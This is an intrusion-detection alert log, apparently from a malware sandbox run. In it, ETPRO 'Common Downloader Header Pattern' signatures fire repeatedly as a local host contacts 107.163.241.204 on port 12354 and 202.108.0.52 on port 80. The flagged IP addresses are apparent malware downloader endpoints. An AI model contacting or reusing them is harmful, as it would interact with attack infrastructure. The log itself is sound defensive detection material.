                                                      2024-12-11T16:23:53.890593+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949750107.163.241.20412354TCP
                                                      2024-12-11T16:23:56.303416+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949772107.163.241.20412354TCP
                                                      2024-12-11T16:23:56.303417+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949773107.163.241.20412354TCP
                                                      2024-12-11T16:23:56.791299+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949784202.108.0.5280TCP
                                                      2024-12-11T16:23:58.018318+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949796107.163.241.20412354TCP
                                                      2024-12-11T16:23:58.018413+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949798107.163.241.20412354TCP
                                                      2024-12-11T16:23:59.829136+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949816202.108.0.5280TCP
                                                      2024-12-11T16:24:00.253086+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949814107.163.241.20412354TCP
                                                      2024-12-11T16:24:00.382672+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949815107.163.241.20412354TCP
                                                      2024-12-11T16:24:02.018923+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949842107.163.241.20412354TCP
                                                      2024-12-11T16:24:02.018923+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949840107.163.241.20412354TCP
                                                      2024-12-11T16:24:03.868947+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949859202.108.0.5280TCP
                                                      2024-12-11T16:24:04.284200+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949857107.163.241.20412354TCP
                                                      2024-12-11T16:24:04.422135+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949860107.163.241.20412354TCP
                                                      2024-12-11T16:24:06.030356+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949884107.163.241.20412354TCP
                                                      2024-12-11T16:24:06.030511+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949887107.163.241.20412354TCP
                                                      2024-12-11T16:24:08.003779+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949906202.108.0.5280TCP
                                                      2024-12-11T16:24:08.265325+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949903107.163.241.20412354TCP
                                                      2024-12-11T16:24:08.390411+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949905107.163.241.20412354TCP
                                                      2024-12-11T16:24:10.158882+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949932107.163.241.20412354TCP
                                                      2024-12-11T16:24:10.158902+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949929107.163.241.20412354TCP
                                                      2024-12-11T16:24:12.056552+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949954202.108.0.5280TCP
                                                      2024-12-11T16:24:12.390865+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949952107.163.241.20412354TCP
                                                      2024-12-11T16:24:12.624896+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949955107.163.241.20412354TCP
                                                      2024-12-11T16:24:14.176674+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949983107.163.241.20412354TCP
                                                      2024-12-11T16:24:14.176738+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949979107.163.241.20412354TCP
                                                      2024-12-11T16:24:16.057989+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.950003202.108.0.5280TCP
                                                      2024-12-11T16:24:16.422328+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950000107.163.241.20412354TCP
                                                      2024-12-11T16:24:16.657593+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950002107.163.241.20412354TCP
                                                      2024-12-11T16:24:18.190233+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950028107.163.241.20412354TCP
                                                      2024-12-11T16:24:18.190278+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950032107.163.241.20412354TCP
                                                      2024-12-11T16:24:20.017510+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.950051202.108.0.5280TCP
                                                      2024-12-11T16:24:20.459981+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950048107.163.241.20412354TCP
                                                      2024-12-11T16:24:20.547172+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950050107.163.241.20412354TCP
                                                      2024-12-11T16:24:22.233432+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950080107.163.241.20412354TCP
                                                      2024-12-11T16:24:22.233453+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950077107.163.241.20412354TCP
                                                      2024-12-11T16:24:24.055802+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.950103202.108.0.5280TCP
                                                      2024-12-11T16:24:24.482620+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950100107.163.241.20412354TCP
                                                      2024-12-11T16:24:24.594050+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950102107.163.241.20412354TCP
                                                      2024-12-11T16:24:26.236605+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950130107.163.241.20412354TCP
                                                      2024-12-11T16:24:26.236679+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950127107.163.241.20412354TCP
                                                      2024-12-11T16:24:28.046919+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.950153202.108.0.5280TCP
                                                      2024-12-11T16:24:28.529616+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950150107.163.241.20412354TCP
                                                      2024-12-11T16:24:28.649777+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950152107.163.241.20412354TCP
                                                      2024-12-11T16:24:30.251968+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950177107.163.241.20412354TCP
                                                      2024-12-11T16:24:30.252001+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950180107.163.241.20412354TCP
                                                      2024-12-11T16:24:32.061847+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.950203202.108.0.5280TCP
                                                      2024-12-11T16:24:32.484735+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950200107.163.241.20412354TCP
                                                      2024-12-11T16:24:32.610317+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950204107.163.241.20412354TCP
                                                      2024-12-11T16:24:34.260322+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950236107.163.241.20412354TCP
                                                      2024-12-11T16:24:34.260451+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950233107.163.241.20412354TCP
                                                      2024-12-11T16:24:36.063719+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.950258202.108.0.5280TCP
                                                      2024-12-11T16:24:36.482958+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950255107.163.241.20412354TCP
                                                      2024-12-11T16:24:36.603552+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950257107.163.241.20412354TCP
                                                      2024-12-11T16:24:38.268096+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950289107.163.241.20412354TCP
                                                      2024-12-11T16:24:38.268130+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950292107.163.241.20412354TCP
                                                      2024-12-11T16:24:40.515932+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950317107.163.241.20412354TCP
                                                      2024-12-11T16:24:40.623860+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950319107.163.241.20412354TCP
                                                      2024-12-11T16:24:42.283052+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950356107.163.241.20412354TCP
                                                      2024-12-11T16:24:42.283196+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.950320202.108.0.5280TCP
                                                      2024-12-11T16:24:42.283199+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950354107.163.241.20412354TCP
                                                      2024-12-11T16:24:44.516425+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950382107.163.241.20412354TCP
                                                      2024-12-11T16:24:44.640596+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950385107.163.241.20412354TCP
                                                      2024-12-11T16:24:44.655236+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.950386202.108.0.5280TCP
                                                      2024-12-11T16:24:46.307062+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950414107.163.241.20412354TCP
                                                      2024-12-11T16:24:46.307144+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950416107.163.241.20412354TCP
                                                      2024-12-11T16:24:48.144847+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.950451202.108.0.5280TCP
                                                      2024-12-11T16:24:48.533080+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950446107.163.241.20412354TCP
                                                      2024-12-11T16:24:48.691211+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950450107.163.241.20412354TCP
                                                      2024-12-11T16:24:50.455795+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950487107.163.241.20412354TCP
                                                      2024-12-11T16:24:50.455806+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950483107.163.241.20412354TCP
                                                      2024-12-11T16:24:52.271421+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.950520202.108.0.5280TCP
                                                      2024-12-11T16:24:52.688069+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950517107.163.241.20412354TCP
                                                      2024-12-11T16:24:52.812873+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950521107.163.241.20412354TCP
                                                      2024-12-11T16:24:54.470959+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950571107.163.241.20412354TCP
                                                      2024-12-11T16:24:54.471060+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950574107.163.241.20412354TCP
                                                      2024-12-11T16:24:56.292372+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.950615202.108.0.5280TCP
                                                      2024-12-11T16:24:56.785363+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950610107.163.241.20412354TCP
                                                      2024-12-11T16:24:56.829068+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950614107.163.241.20412354TCP
                                                      2024-12-11T16:24:58.489654+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950681107.163.241.20412354TCP
                                                      2024-12-11T16:24:58.489687+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950675107.163.241.20412354TCP
                                                      2024-12-11T16:25:00.327134+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.950731202.108.0.5280TCP
                                                      2024-12-11T16:25:00.857922+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950726107.163.241.20412354TCP
                                                      2024-12-11T16:25:00.876287+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950730107.163.241.20412354TCP
                                                      2024-12-11T16:25:02.673947+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950810107.163.241.20412354TCP
                                                      2024-12-11T16:25:02.673978+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950804107.163.241.20412354TCP
                                                      2024-12-11T16:25:04.663212+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.950862202.108.0.5280TCP
                                                      2024-12-11T16:25:05.064847+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950858107.163.241.20412354TCP
                                                      2024-12-11T16:25:05.186377+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950861107.163.241.20412354TCP
                                                      2024-12-11T16:25:06.955156+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950959107.163.241.20412354TCP
                                                      2024-12-11T16:25:06.955323+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950969107.163.241.20412354TCP
                                                      2024-12-11T16:25:08.789547+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.951060202.108.0.5280TCP
                                                      2024-12-11T16:25:09.188278+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.951054107.163.241.20412354TCP
                                                      2024-12-11T16:25:09.298687+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.951059107.163.241.20412354TCP
                                                      2024-12-11T16:25:10.955064+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.951174107.163.241.20412354TCP
                                                      2024-12-11T16:25:10.955087+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.951165107.163.241.20412354TCP
                                                      2024-12-11T16:25:12.778422+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.951280202.108.0.5280TCP
                                                      2024-12-11T16:25:13.188982+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.951270107.163.241.20412354TCP
                                                      2024-12-11T16:25:13.424881+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.951281107.163.241.20412354TCP
                                                      2024-12-11T16:25:15.095798+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.951398107.163.241.20412354TCP
                                                      2024-12-11T16:25:15.095859+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.951413107.163.241.20412354TCP
                                                      2024-12-11T16:25:16.915501+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.951528202.108.0.5280TCP
                                                      2024-12-11T16:25:17.345616+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.951518107.163.241.20412354TCP
                                                      2024-12-11T16:25:17.438537+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.951526107.163.241.20412354TCP
                                                      2024-12-11T16:25:19.111413+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.951656107.163.241.20412354TCP
                                                      2024-12-11T16:25:19.111431+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.951647107.163.241.20412354TCP
                                                      2024-12-11T16:25:20.919423+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.951755202.108.0.5280TCP
                                                      2024-12-11T16:25:21.344835+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.951746107.163.241.20412354TCP
                                                      2024-12-11T16:25:21.459218+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.951754107.163.241.20412354TCP
                                                      2024-12-11T16:25:23.130264+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.951895107.163.241.20412354TCP
                                                      2024-12-11T16:25:23.130347+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.951887107.163.241.20412354TCP
                                                      2024-12-11T16:25:25.009831+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.953200202.108.0.5280TCP
                                                      2024-12-11T16:25:25.398283+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.953096107.163.241.20412354TCP
                                                      2024-12-11T16:25:25.488125+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.953196107.163.241.20412354TCP
                                                      2024-12-11T16:25:27.142945+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.955373107.163.241.20412354TCP
                                                      2024-12-11T16:25:27.143418+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.955196107.163.241.20412354TCP
                                                      2024-12-11T16:25:28.958074+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.956944202.108.0.5280TCP
                                                      2024-12-11T16:25:29.394582+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.956825107.163.241.20412354TCP
                                                      2024-12-11T16:25:29.502142+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.956943107.163.241.20412354TCP
                                                      2024-12-11T16:25:31.158000+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.958262107.163.241.20412354TCP
                                                      2024-12-11T16:25:31.158120+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.958391107.163.241.20412354TCP
                                                      2024-12-11T16:25:32.986227+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.960100202.108.0.5280TCP
                                                      2024-12-11T16:25:33.409008+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.959886107.163.241.20412354TCP
                                                      2024-12-11T16:25:33.582161+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.960187107.163.241.20412354TCP
                                                      2024-12-11T16:25:35.161257+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.962140107.163.241.20412354TCP
                                                      2024-12-11T16:25:35.161334+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.962324107.163.241.20412354TCP
                                                      2024-12-11T16:25:36.966819+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.963952202.108.0.5280TCP
                                                      2024-12-11T16:25:37.393782+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.963850107.163.241.20412354TCP
                                                      2024-12-11T16:25:37.527730+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.963953107.163.241.20412354TCP
                                                      2024-12-11T16:25:39.174337+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.950337202.108.0.5280TCP
                                                      2024-12-11T16:25:39.174379+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949568107.163.241.20412354TCP
                                                      2024-12-11T16:25:39.174382+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949408107.163.241.20412354TCP
                                                      2024-12-11T16:25:40.982007+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.950977202.108.0.5280TCP
                                                      2024-12-11T16:25:41.422540+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950887107.163.241.20412354TCP
                                                      2024-12-11T16:25:41.516828+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950978107.163.241.20412354TCP
                                                      2024-12-11T16:25:43.390201+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.953380202.108.0.5280TCP
                                                      2024-12-11T16:25:43.390315+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.952262107.163.241.20412354TCP
                                                      2024-12-11T16:25:43.390350+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.952324107.163.241.20412354TCP
                                                      2024-12-11T16:25:45.263834+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.953422202.108.0.5280TCP
                                                      2024-12-11T16:25:45.704668+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.953384107.163.241.20412354TCP
                                                      2024-12-11T16:25:45.820890+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.953421107.163.241.20412354TCP
                                                      2024-12-11T16:25:47.489520+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.955526107.163.241.20412354TCP
                                                      2024-12-11T16:25:47.489539+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.955962202.108.0.5280TCP
                                                      2024-12-11T16:25:47.489568+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.955505107.163.241.20412354TCP
                                                      2024-12-11T16:25:49.296299+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.956327202.108.0.5280TCP
                                                      2024-12-11T16:25:49.735788+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.956247107.163.241.20412354TCP
                                                      2024-12-11T16:25:49.845073+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.956326107.163.241.20412354TCP
                                                      2024-12-11T16:25:51.501863+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.958061107.163.241.20412354TCP
                                                      2024-12-11T16:25:51.501893+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.958828202.108.0.5280TCP
                                                      2024-12-11T16:25:51.501922+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.957951107.163.241.20412354TCP
                                                      2024-12-11T16:25:53.311911+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.959066202.108.0.5280TCP
                                                      2024-12-11T16:25:53.740745+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.958996107.163.241.20412354TCP
                                                      2024-12-11T16:25:53.848769+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.959064107.163.241.20412354TCP
                                                      2024-12-11T16:25:55.520324+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.960767107.163.241.20412354TCP
                                                      2024-12-11T16:25:55.520327+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.960826107.163.241.20412354TCP
                                                      2024-12-11T16:25:57.315350+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.962750202.108.0.5280TCP
                                                      2024-12-11T16:25:57.751798+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.962599107.163.241.20412354TCP
                                                      2024-12-11T16:25:57.861170+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.962749107.163.241.20412354TCP
                                                      2024-12-11T16:25:59.533787+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.964837107.163.241.20412354TCP
                                                      2024-12-11T16:25:59.533787+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949590202.108.0.5280TCP
                                                      2024-12-11T16:25:59.533794+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.964938107.163.241.20412354TCP
                                                      2024-12-11T16:26:01.342570+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949927202.108.0.5280TCP
                                                      2024-12-11T16:26:01.783128+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949903107.163.241.20412354TCP
                                                      2024-12-11T16:26:01.892106+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949928107.163.241.20412354TCP
                                                      2024-12-11T16:26:03.552117+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950952107.163.241.20412354TCP
                                                      2024-12-11T16:26:03.552519+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.950770107.163.241.20412354TCP
                                                      2024-12-11T16:26:05.328584+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.952124202.108.0.5280TCP
                                                      2024-12-11T16:26:05.782889+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.952076107.163.241.20412354TCP
                                                      2024-12-11T16:26:05.892252+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.952148107.163.241.20412354TCP
                                                      2024-12-11T16:26:07.564951+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.956006202.108.0.5280TCP
                                                      2024-12-11T16:26:07.564993+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.954341107.163.241.20412354TCP
                                                      2024-12-11T16:26:07.564997+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.954178107.163.241.20412354TCP
                                                      2024-12-11T16:26:09.404639+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.956383202.108.0.5280TCP
                                                      2024-12-11T16:26:09.815489+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.956340107.163.241.20412354TCP
                                                      2024-12-11T16:26:09.944582+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.956384107.163.241.20412354TCP
                                                      2024-12-11T16:26:11.581670+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.958881202.108.0.5280TCP
                                                      2024-12-11T16:26:11.581694+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.958350107.163.241.20412354TCP
                                                      2024-12-11T16:26:11.581720+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.958345107.163.241.20412354TCP
                                                      2024-12-11T16:26:13.392656+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.959214202.108.0.5280TCP
                                                      2024-12-11T16:26:13.814424+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.959128107.163.241.20412354TCP
                                                      2024-12-11T16:26:13.922594+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.959213107.163.241.20412354TCP
                                                      2024-12-11T16:26:15.714568+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.960550107.163.241.20412354TCP
                                                      2024-12-11T16:26:15.714727+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.960645107.163.241.20412354TCP
                                                      2024-12-11T16:26:17.516942+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.961877202.108.0.5280TCP
                                                      2024-12-11T16:26:17.954784+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.961837107.163.241.20412354TCP
                                                      2024-12-11T16:26:18.175392+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.961878107.163.241.20412354TCP
                                                      2024-12-11T16:26:19.721041+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.965375202.108.0.5280TCP
                                                      2024-12-11T16:26:19.721076+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.963928107.163.241.20412354TCP
                                                      2024-12-11T16:26:19.721104+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.963820107.163.241.20412354TCP
                                                      2024-12-11T16:26:21.523696+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.949288202.108.0.5280TCP
                                                      2024-12-11T16:26:21.956590+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949227107.163.241.20412354TCP
                                                      2024-12-11T16:26:22.064152+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.949286107.163.241.20412354TCP
                                                      2024-12-11T16:26:23.736151+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.951231107.163.241.20412354TCP
                                                      2024-12-11T16:26:23.736160+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.952401202.108.0.5280TCP
                                                      2024-12-11T16:26:23.736202+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.951179107.163.241.20412354TCP
                                                      2024-12-11T16:26:25.525697+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.952941202.108.0.5280TCP
                                                      2024-12-11T16:26:25.970593+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.952745107.163.241.20412354TCP
                                                      2024-12-11T16:26:26.078215+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.952943107.163.241.20412354TCP
                                                      2024-12-11T16:26:27.751723+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.955715202.108.0.5280TCP
                                                      2024-12-11T16:26:27.751848+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.955105107.163.241.20412354TCP
                                                      2024-12-11T16:26:27.751865+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.955099107.163.241.20412354TCP
                                                      2024-12-11T16:26:29.551664+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.956267202.108.0.5280TCP
                                                      2024-12-11T16:26:30.003505+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.956148107.163.241.20412354TCP
                                                      2024-12-11T16:26:30.095486+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.956266107.163.241.20412354TCP
                                                      2024-12-11T16:26:32.005887+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.957654107.163.241.20412354TCP
                                                      2024-12-11T16:26:32.006116+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.957522107.163.241.20412354TCP
                                                      2024-12-11T16:26:33.766154+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.959063202.108.0.5280TCP
                                                      2024-12-11T16:26:34.236624+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.959061107.163.241.20412354TCP
                                                      2024-12-11T16:26:34.361167+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.959074107.163.241.20412354TCP
                                                      2024-12-11T16:26:36.004804+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.961971202.108.0.5280TCP
